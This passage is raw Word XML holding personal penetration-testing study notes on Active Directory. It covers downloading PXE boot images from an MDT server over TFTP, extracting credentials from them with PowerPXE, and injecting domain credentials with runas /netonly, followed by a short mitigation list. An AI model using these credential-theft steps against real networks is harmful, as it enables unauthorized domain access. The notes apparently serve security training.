          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>PXE Boot image is a part of BCD file</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>that contains the PXE boot images and its configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C3F6C" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MDT (Microsoft Deployment Toolkit) server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> often stores the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Boot Configuration Data (BCD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, which contains boot parameters and PXE settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69EB53" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t>As attackers we use</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> TFTP </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> download</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BCD</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> to read the configuration of the MDT server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>tftp -i MDT-SERVER-IP GET Boot\BCD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75A7DD" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t xml:space="preserve">Recover the PXE images to see the configuration in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>edit to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> privilege </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>escalation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or expose credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5CBE3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t xml:space="preserve">Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B8E05" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-WimFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve">function of powerpxe to recover </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the locations of the PXE Boot images from the BCD file</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35642564" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F83C6D">
        <w:t>Import-Module .\PowerPXE.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB436B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F27A5">
        <w:t>$BCDFile = "</w:t>
      </w:r>
      <w:r>
        <w:t>the_downloaded-bcd-file</w:t>
      </w:r>
      <w:r w:rsidRPr="003F27A5">
        <w:t>.bcd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5654C3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F27A5">
        <w:t>Get-WimFile -bcdFile $BCDFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE7E1B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Now again </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TFTP to get PXE Boot images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03388D4E" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F27A5">
        <w:t>tftp -i &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>remote</w:t>
      </w:r>
      <w:r w:rsidRPr="003F27A5">
        <w:t xml:space="preserve"> IP&gt; GET "&lt;PXE Boot Image Location&gt;" pxeboot.wim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91A55B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="002B67FF" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidRPr="003F27A5">
        <w:t>Recovering Credentials from a PXE Boot Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D815A7F" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F27A5">
        <w:t>Get-FindCredentials -WimFile pxeboot.wim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36797ABA" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D65FB13" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40B29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WIM files are bootable images in the Windows Imaging Format (WIM).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider the WIM file is the PXE image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DE902" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WIM is stored in BCD that is stored and managed by MDT integrated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8657C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0DB27" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A43086" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B070D4">
        <w:t> configuration files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E657D9" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B070D4" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B070D4">
        <w:t>Web application config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C51180" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B070D4" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B070D4">
        <w:lastRenderedPageBreak/>
        <w:t>Service configuration files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D2409" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B070D4" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B070D4">
        <w:t>Registry keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C1A26" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B070D4" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B070D4">
        <w:t>Centrally deployed applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA41C71" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B070D4">
        <w:t>enumeration scripts, such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B070D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Seatbelt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B070D4">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00B070D4">
        <w:t>an be used to automate this process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3DF9D" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE"/>
    <w:p w14:paraId="5706453A" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00103854" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269AAEF1" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00103854">
        <w:t>Limit the exposure of AD services and applications online</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00103854">
        <w:t>applications should be placed in an intranet that can be accessed through a VPN. The VPN can then support multi-factor authentication for added security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17362A78" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00103854">
        <w:t>Enforce Network Access Control (NAC) - NAC can prevent attackers from connecting rogue devices on the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14080C0C" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00103854" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00103854">
        <w:t>Enforce SMB Signing - By enforcing SMB signing, SMB relay attacks are not possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C2E2A8" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00103854">
        <w:t>Follow the principle of least privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E06A5" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE"/>
    <w:p w14:paraId="1BD1C9F3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE"/>
    <w:p w14:paraId="5A3D393B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B070D4" w:rsidRDefault="00203EBE" w:rsidP="00203EBE"/>
    <w:p w14:paraId="79C970FC" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40006A9C" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B06AE46" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5897D5" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C5AF81" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EABBB5" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652FF268" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B736FF2" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169A93E6" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43289122" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369C3410" w14:textId="042C0119" w:rsidR="00F61A2B" w:rsidRPr="00710BF6" w:rsidRDefault="00F61A2B" w:rsidP="00710BF6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Active Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49DAED" w14:textId="4657C27F" w:rsidR="00F61A2B" w:rsidRPr="00710BF6" w:rsidRDefault="00710BF6" w:rsidP="00710BF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00710BF6">
        <w:t>Credential Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29DF1D" w14:textId="73E63DB1" w:rsidR="00710BF6" w:rsidRPr="00710BF6" w:rsidRDefault="00710BF6" w:rsidP="00710BF6">
      <w:r w:rsidRPr="00710BF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Know Your Enemy Windows vs Linux: </w:t>
      </w:r>
      <w:r w:rsidRPr="00710BF6">
        <w:t>each one will be enumerated with support tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5D188" w14:textId="7E7C38E5" w:rsidR="00F61A2B" w:rsidRDefault="00710BF6" w:rsidP="00710BF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00710BF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runas Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B065E8" w14:textId="328A89DC" w:rsidR="006B3A84" w:rsidRPr="006B3A84" w:rsidRDefault="006B3A84" w:rsidP="006B3A84">
      <w:r w:rsidRPr="006B3A84">
        <w:t>Used when there are AD credentials but nowhere to log in with them</w:t>
      </w:r>
      <w:r>
        <w:t>, simply when I have machine with user that not on domain and I need to interact with domain with a domain user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B9AEC" w14:textId="12B23FA4" w:rsidR="00710BF6" w:rsidRPr="00710BF6" w:rsidRDefault="00710BF6" w:rsidP="00710BF6">
      <w:r w:rsidRPr="00710BF6">
        <w:t xml:space="preserve">Built in windows command used to </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run commands as another user</w:t>
      </w:r>
      <w:r w:rsidRPr="00710BF6">
        <w:t>, used Bec we may find credentials and not need to create another machine and join it to domain with this domain credentials, so we just run as another domain user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098C7EEE" w14:textId="77777777" w:rsidR="00710BF6" w:rsidRPr="00637BAC" w:rsidRDefault="00710BF6" w:rsidP="00637BAC">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00637BAC">
        <w:t>runas.exe /netonly /user:&lt;domain&gt;\&lt;username&gt; cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C85DAD" w14:textId="324CA2C7" w:rsidR="006841C5" w:rsidRPr="006841C5" w:rsidRDefault="006841C5" w:rsidP="006841C5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> we</w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> injected our AD credentials into memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, now </w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>all network communication will use these injected credentials for authentication. This includes all network communications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4419A" w14:textId="7E8808D9" w:rsidR="00637BAC" w:rsidRPr="00637BAC" w:rsidRDefault="00637BAC" w:rsidP="00637BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>netonly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - The credentials provided will only be used for network authentication. Locally, the process will still run under the current logged-in user. If we run </w:t>
      </w:r>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside cmd.exe, it will still show your original user. But if we access network shares inside cmd.exe it will access it as the runas user and will use the credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E56519" w14:textId="5E805FA4" w:rsidR="00637BAC" w:rsidRPr="00637BAC" w:rsidRDefault="00637BAC" w:rsidP="00637BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> - username. It is always a safe bet to use the Fully Qualified Domain Name (FQDN) instead of just the NetBIOS name of the domain since this will help with resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6433BF" w14:textId="7DE1FFED" w:rsidR="00637BAC" w:rsidRPr="00637BAC" w:rsidRDefault="00637BAC" w:rsidP="00637BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00637BAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This is the program we want to execute once the credentials are injected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C893D2" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5" w:rsidP="006841C5"/>
    <w:p w14:paraId="3C9D8724" w14:textId="1DC02E9A" w:rsidR="00F61A2B" w:rsidRDefault="00637BAC" w:rsidP="006841C5">
      <w:r w:rsidRPr="00637BAC">
        <w:t>Any AD account can read the contents of the SYSVOL directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00637BAC">
        <w:t>shared folder storing the Group Policy Objects (GPOs</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
